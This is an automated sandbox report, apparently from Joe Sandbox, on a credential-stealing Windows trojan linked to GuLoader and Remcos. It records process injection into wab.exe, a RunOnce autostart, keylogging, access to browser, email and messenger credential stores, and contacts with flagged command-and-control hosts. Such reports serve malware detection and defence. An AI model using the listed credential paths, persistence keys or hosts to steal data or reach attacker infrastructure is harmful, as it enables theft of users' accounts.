              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeCode function: 5_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_0040338F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00408043 memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,10_2_00408043

              Stealing of Sensitive Information

              Source: Yara matchFile source: 00000007.00000002.54464219226.0000000000A80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 2856, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, type: DROPPED
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: ESMTPPassword 10_2_004033E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 10_2_00402DA5
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 10_2_00402DA5
              Source: Yara match | File source: Process Memory Space: wab.exe PID: 2856, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: wab.exe PID: 3368, type: MEMORYSTR
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\Paltalk
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

              Remote Access Functionality

              Source: Yara matchFile source: 00000007.00000002.54464219226.0000000000A80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 2856, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, type: DROPPED
              Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
              Valid Accounts | 11 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot
              Default Accounts | 2 Command and Scripting Interpreter | 1 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 2 Obfuscated Files or Information | 11 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | Exfiltration Over Bluetooth | 1 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
              Domain Accounts | At (Linux) | Logon Script (Windows) | 212 Process Injection | 1 DLL Side-Loading | 2 Credentials in Registry | 3 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | Automated Exfiltration | 1 Non-Standard Port | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
              Local Accounts | At (Windows) | Logon Script (Mac) | 1 Registry Run Keys / Startup Folder | 1 Masquerading | 1 Credentials In Files | 28 System Information Discovery | Distributed Component Object Model | 11 Input Capture | Scheduled Transfer | 2 Non-Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
              Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 2 Virtualization/Sandbox Evasion | LSA Secrets | 31 Security Software Discovery | SSH | 11 Clipboard Data | Data Transfer Size Limits | 112 Application Layer Protocol | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
              Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Access Token Manipulation | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
              External Remote Services | Scheduled Task | Startup Items | Startup Items | 212 Process Injection | DCSync | 4 Process Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
              Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 Application Window Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
              Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
              Behavior Graph ID: 1332661 Sample: #U0412#U0421_#U0436#U0438#U... Startdate: 26/10/2023 Architecture: WINDOWS Score: 100
              DNS/IP: ourt2949aslumes9.duckdns.org; gudanidevelopment.ge; geoplugin.net
              Signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Antivirus detection for dropped file; 8 other signatures
              Process: #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe (started)
                Dropped: C:\Users\user\AppData\Local\...\System.dll, PE32
                Signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process
                Process: wab.exe (started)
                  DNS/IP: 94.156.6.253, 2402, 50055, 50056 NET1-ASBG Bulgaria
                  DNS/IP: gudanidevelopment.ge 217.147.225.69, 50054, 80 GRENA-ASTbilisiGeorgiaGE Georgia
                  DNS/IP: geoplugin.net 178.237.33.50, 50057, 80 ATOM86-ASATOM86NL Netherlands
                  Dropped: C:\Users\user\AppData\Local\...\Tramper.exe, PE32
                  Dropped: C:\Users\user\AppData\Roaming\paqlgkfs.dat, data
                  Signatures: Maps a DLL or memory area into another process; Installs a global keyboard hook
                  Process: wab.exe (started)
                    Signatures: Tries to steal Instant Messenger accounts or passwords; Tries to harvest and steal browser information (history, passwords, etc)
                  Process: wab.exe (started)
                    Signatures: Tries to steal Mail credentials (via file / registry access)
                  Process: wab.exe (started)

              Source | Detection | Scanner | Label | Link
              #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe | 100% | Avira | HEUR/AGEN.1338455 |
              #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe | 21% | Virustotal | | Browse
              #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe | 5% | ReversingLabs | |

              Source | Detection | Scanner | Label | Link
              C:\Users\user\AppData\Local\Temp\Gummibaand\Tramper.exe | 100% | Avira | HEUR/AGEN.1338455 |
              C:\Users\user\AppData\Local\Temp\Gummibaand\Tramper.exe | 5% | ReversingLabs | |
              C:\Users\user\AppData\Local\Temp\nsk21A3.tmp\System.dll | 0% | ReversingLabs | |

              No Antivirus matches

              Source | Detection | Scanner | Label | Link
              gudanidevelopment.ge | 0% | Virustotal | | Browse
              geoplugin.net | 0% | Virustotal | | Browse
              ourt2949aslumes9.duckdns.org | 13% | Virustotal | | Browse

              Source | Detection | Scanner | Label | Link
              http://pki.goog/repo/certs/gts1c3.der070%Avira URL Cloudsafe
              http://crls.pki.goog/gts1c3/zdATt0Ex_Fk.crl00%VirustotalBrowse
              https://sb.scorecardresearch.com/beacon.js0%Avira URL Cloudsafe
              https://csp.withgoogle.com/csp/report-to/adspam-signals-scs0%VirustotalBrowse
              http://pki.goog/gsr1/gsr1.crt020%Avira URL Cloudsafe
              http://pki.goog/repo/certs/gts1c3.der0$0%Avira URL Cloudsafe
              https://sb.scorecardresearch.com/b2?c1=2&c2=3000001&cs_ucfr=1&rn=1632306836522&c7=https%3A%2F%2Fwww.0%Avira URL Cloudsafe
              https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_368%2Cw_622%2Cc_fill%2Cg_faces:au0%Avira URL Cloudsafe
              https://get3.adobe0%Avira URL Cloudsafe
              http://pki.goog/gsr1/gsr1.crt020%VirustotalBrowse
              https://sb.scorecardresearch.com/beacon.js0%VirustotalBrowse
              http://pki.goog/repo/certs/gts1c3.der071%VirustotalBrowse
              https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%Avira URL Cloudsafe
              http://geoplugin.net/json.gp0%Avira URL Cloudsafe
              http://pki.goog/repo/certs/gts1c3.der0$0%VirustotalBrowse
              https://sb.scorecardresearch.com/b2?c1=2&c2=3000001&cs_ucfr=1&rn=1632306836522&c7=https%3A%2F%2Fwww.0%VirustotalBrowse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
gudanidevelopment.ge | 217.147.225.69 | true | true | | unknown
geoplugin.net | 178.237.33.50 | true | false | | unknown
ourt2949aslumes9.duckdns.org | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://geoplugin.net/json.gp | false | Avira URL Cloud: safe | unknown
                                                                                                                                https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_368%2Cw_622%2Cc_fill%2Cg_faces:aubhv7197.tmp.9.drfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://get3.adobewab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCacc6c4ed30494f9fad065afe638a7cabhv7197.tmp.9.drfalse
                                                                                                                                  high
                                                                                                                                  https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:aubhv7197.tmp.9.drfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://cvision.media.net/new/300x300/2/75/165/127/fefc2984-60ee-407b-a704-0db527f30f53.jpg?v=9bhv7197.tmp.9.drfalse
                                                                                                                                    high
                                                                                                                                    • No. of IPs < 25%
                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                    • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
94.156.6.253 | unknown | Bulgaria | 43561 | NET1-ASBG | true
217.147.225.69 | gudanidevelopment.ge | Georgia | 20545 | GRENA-ASTbilisiGeorgiaGE | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
Joe Sandbox Version: 38.0.0 Ammolite
Analysis ID: 1332661
Start date and time: 2023-10-26 14:26:30 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 16m 40s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name: Suspected Instruction Hammering
Number of analysed new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
Detection: MAL
Classification: mal100.phis.troj.spyw.evad.winEXE@9/19@4/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 179
• Number of non-executed functions: 333
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): spclient.wg.spotify.com
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
13:28:41 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Sundhedspolitikken C:\Users\user\AppData\Local\Temp\Gummibaand\Tramper.exe
13:28:50 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Sundhedspolitikken C:\Users\user\AppData\Local\Temp\Gummibaand\Tramper.exe
14:29:20 | API Interceptor | 37497101x Sleep call for process: wab.exe modified
                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                            PSID CA 0338-2023-24.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                            Ordini_SRLPhantas35t6343573423646000000345235623.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                            rfq_purchase_order_catalog_design_no_TZ806_23102023_00000000_pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                            DETAILS_AND_INVOICES.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                            rIMG-2023010_WAAa646737kendelsesordniGenicular.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                            SMGS-RCDU5010031.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                            IMG-2023010_WAA646737kendelsesordniGenicular.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                            • 178.237.33.50
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: JSON data
Category: dropped
Size (bytes): 958
Entropy (8bit): 5.009537360440655
Encrypted: false
SSDEEP: 12:tkECnd6CsGkMyGWKyMPVGADTogmayHnmGcArpv/mOAaNO+ao9W7iN5zzkw7Lpm9J:qNdRNuKyM8fvXhNlT3/7SxDWro
MD5: 1FA350F572C47FA33999940A72AC60C0
SHA1: F4820EF23B2796EAB95F098E543FDB6E0C03B732
SHA-256: 84A51CEB01A676386E0AF8AC7A05CCC7E80FBDE29B7490AA00B74EE820727C68
SHA-512: E035A9C759707D4329DE340A798CE3D5A529A034FBFE30E4C9A783BA8E460385069430996102B2882218E1C9E2019A50900B82B1A3A6E6ADCFD5970B409AC3A1
Malicious: false
Reputation: low
Preview:
{
  "geoplugin_request":"102.129.153.223",
  "geoplugin_status":200,
  "geoplugin_delay":"1ms",
  "geoplugin_credit":"Some of the returned data includes GeoLite data created by MaxMind, available from <a href='http:\/\/www.maxmind.com'>http:\/\/www.maxmind.com<\/a>.",
  "geoplugin_city":"Miami",
  "geoplugin_region":"Florida",
  "geoplugin_regionCode":"FL",
  "geoplugin_regionName":"Florida",
  "geoplugin_areaCode":"",
  "geoplugin_dmaCode":"528",
  "geoplugin_countryCode":"US",
  "geoplugin_countryName":"United States",
  "geoplugin_inEU":0,
  "geoplugin_euVATrate":false,
  "geoplugin_continentCode":"NA",
  "geoplugin_continentName":"North America",
  "geoplugin_latitude":"25.7689",
  "geoplugin_longitude":"-80.1946",
  "geoplugin_locationAccuracyRadius":"20",
  "geoplugin_timezone":"America\/New_York",
  "geoplugin_currencyCode":"USD",
  "geoplugin_currencySymbol":"$",
  "geoplugin_currencySymbol_UTF8":"$",
  "geoplugin_currencyConverter":0
}
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):734679
                                                                                                                                                                                                                  Entropy (8bit):7.553222139454719
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12288:uJWNBQfagdRGe/kEZusRW2FDipfAXRJ8+2FRAjI9XLvlDwLEuSflue6VfFtqdXFa:uWW6rE6MqY6VujkbvFHfluNtqdXFa
                                                                                                                                                                                                                  MD5:8B1422D6B17DD727C69291AA1FF09481
                                                                                                                                                                                                                  SHA1:B09AC93EF0313867A755E59CF4B108EE5B376754
                                                                                                                                                                                                                  SHA-256:F08AB03484809D162963CF54A40B81F7722A83984744ECC79F4626B75B829B46
                                                                                                                                                                                                                  SHA-512:13F4DCB158DE69339CB6DFF93CD29EC92CAECBBB0CF49C0FD9A605CDF8796F3B851201E80C6579220E93A445A59328741B5DD58E3C7F94B1173CAA566B0DAE7C
                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x8aa0994f, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):41943040
                                                                                                                                                                                                                  Entropy (8bit):1.3247960625537387
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24576:q7z2CQrhZDq64htP0fY9MkHvOuHisMxmVlPDQgGE+g9jo7Lg/Jo7c/au2o0lfoBg:3rhZDYqfY9lmiPDQgGeUu2
                                                                                                                                                                                                                  MD5:0507BB1A7D81F73ACDD218713A3B56E7
                                                                                                                                                                                                                  SHA1:258C832678DEE74A26047CC3A74697F8BD29951A
                                                                                                                                                                                                                  SHA-256:0BD974037B3F6EBA5B1C7E7E2D86A81741D751EC2A51962D5C1203CE176BA2B8
                                                                                                                                                                                                                  SHA-512:A8A9C1E162A97FB5F99BF7E5B7A7D050E1FE94ADDE4965E548584D6999C5F119AE4467A10BB2D75D2ACE9E00D411CAD963025CE2C24E7A180884F9D070491963
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):12288
                                                                                                                                                                                                                  Entropy (8bit):5.719859767584478
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:1enY0LWelt70elWjvfstJcVtwtYbjnIOg5AaDnbC7ypXhtIj:18PJlt70esj0Mt9vn6ay6
                                                                                                                                                                                                                  MD5:0D7AD4F45DC6F5AA87F606D0331C6901
                                                                                                                                                                                                                  SHA1:48DF0911F0484CBE2A8CDD5362140B63C41EE457
                                                                                                                                                                                                                  SHA-256:3EB38AE99653A7DBC724132EE240F6E5C4AF4BFE7C01D31D23FAF373F9F2EACA
                                                                                                                                                                                                                  SHA-512:C07DE7308CB54205E8BD703001A7FE4FD7796C9AC1B4BB330C77C872BF712B093645F40B80CE7127531FE6746A5B66E18EA073AB6A644934ABED9BB64126FEA9
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                  Joe Sandbox View:
• Filename: privacy.sexy-Setup-0.12.5.exe, Detection: malicious
• Filename: WindowsDriverSetup.exe, Detection: malicious
• Filename: WindowsDriverSetup.exe, Detection: malicious
• Filename: TVU_41-11_PL.exe, Detection: malicious
• Filename: TVU_41-11_PL.exe, Detection: malicious
• Filename: TR9840001-TRANS.DOC.exe, Detection: malicious
• Filename: TR9840001-TRANS.DOC.exe, Detection: malicious
• Filename: Myrosin.exe, Detection: malicious
• Filename: Myrosin.exe, Detection: malicious
• Filename: SecuriteInfo.com.Trojan.Siggen21.47292.30874.29519.exe, Detection: malicious
• Filename: SecuriteInfo.com.Trojan.Siggen21.47292.30874.29519.exe, Detection: malicious
• Filename: New_orderNL201840.exe, Detection: malicious
• Filename: New_orderNL201840.exe, Detection: malicious
• Filename: Bonkers.exe, Detection: malicious
• Filename: HT1150009-Docs.exe, Detection: malicious
• Filename: HT1150009-Docs.exe, Detection: malicious
• Filename: SephioneInstallerx64.exe, Detection: malicious
• Filename: SephioneInstallerx64.exe, Detection: malicious
• Filename: craig.exe, Detection: malicious
                                                                                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:Qn:Qn
                                                                                                                                                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:..
                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):21803
                                                                                                                                                                                                                  Entropy (8bit):4.9383038764473834
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:pFUuUD34eHxVqII046Z+Lqv18gDtkXF7bFuHkyWxWkYY7l:HUxD1RXI0tMLqvHuXZMHZWmY7l
                                                                                                                                                                                                                  MD5:85CC2D5B36C9C45811901DC879424E83
                                                                                                                                                                                                                  SHA1:F7E9C8B480F9642F7C7BF78EECEC50D831E76A4F
                                                                                                                                                                                                                  SHA-256:908CCB30B856193065020AC5E16BC195B1BF2A46D9A314243BF84C9FF9596D1D
                                                                                                                                                                                                                  SHA-512:D1BC157ACA22182CF6432E3CBDCECD5CFDB7E91BC482DF7B17D2F09A0113A41B24128B1498C2358A594C404B557A114DC1E6F343B95824086A64058A4F3BE0A3
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (12052), with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):12052
                                                                                                                                                                                                                  Entropy (8bit):2.7599176206155107
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:FU3FRIApfDOEvIuFF7oilGBx2kH5WBcb2Aes/KSJw9pgblDr:+HBBDTfjANH5Esz8a/
                                                                                                                                                                                                                  MD5:053B8C4406A7D68D3F81BC7797DAB180
                                                                                                                                                                                                                  SHA1:87E6B0D7F74B4F0715A0F458983C224B69FF7804
                                                                                                                                                                                                                  SHA-256:BD0C14B254FF36EFEADDF4AA111AD2F6D1E450E583E4806D10B93122D324C7B8
                                                                                                                                                                                                                  SHA-512:B25AA8C8A3BE36D81CC2043116E0CA9BCADA248C2149ADEEC4465712FE334F134F4AE0F758A1FD218D5D45AD80F1D42FEF8EB46F63F7C9C9C433730B09441685
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):259545
                                                                                                                                                                                                                  Entropy (8bit):7.734845862532547
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6144:xMZRnbukFbmZUPA0PyR4XmODEgoBEKi8e6Rh7:xmnbuw3dmODkYBc
                                                                                                                                                                                                                  MD5:4EDDEE5CB2FB41A4BBC5497F0A202EB7
                                                                                                                                                                                                                  SHA1:35FBB895292DD8FA1BA5C8146079072522A107AB
                                                                                                                                                                                                                  SHA-256:4D100F225442773422ABE5D13F1A06F1FC39CF1FB895EDB7B6BB87057A1A778D
                                                                                                                                                                                                                  SHA-512:0E76FCF397C5947F9E70C685F50336809EB934C49513707F3C729ED76D8782D9998F21C47E5D2849F71CAFC05AEC076CF1F8879BAE69B90E6F33C7FD6275834D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):518
                                                                                                                                                                                                                  Entropy (8bit):4.2438612386567005
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:7ZLxphSHeKKtrz1oI+z1AObYAZ1wqFh87vQ:FNHS+KKtv1op6ObdwmCvQ
                                                                                                                                                                                                                  MD5:56DA579148B8B7B3DF75890CE348AAD9
                                                                                                                                                                                                                  SHA1:59C00C11AA27EE294AEEDFC8A202A30C8F9E7507
                                                                                                                                                                                                                  SHA-256:4082AA3989480E8FA1D8D41A910792B16CAB127428F408FB5E13311307885BC8
                                                                                                                                                                                                                  SHA-512:D33312CA365CB2BF7167066A93CC3A386BC9CF23119A73CBECC73A33EA1F07803E6B126CCDC3402963BCE10C56E8C5E17610A07D2C3ECC7D1A32CC01866BC5BE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:indfringerne skattesprgsmaalenes syphers,undersoegelse fremhaevede udkiksposters servicegarantierne kvder semidefiniteness grene..blattodea sunnier haabefuldt epitomising pedagogying daddelpalmer nonreservation misconstruction moruloid cundeamor biophor balletically..lastefuldt processers vrdiangivelsernes buriss sylfidens udlaaningers..afvrgepligts solidago tartralic unmeteorological frtidspensionbjr info aandlsheden kysk sekundaerprocesser hindbaermarmelade..vertikalerne tusinders hetoroseksualismen nabogrunde.
                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):43841
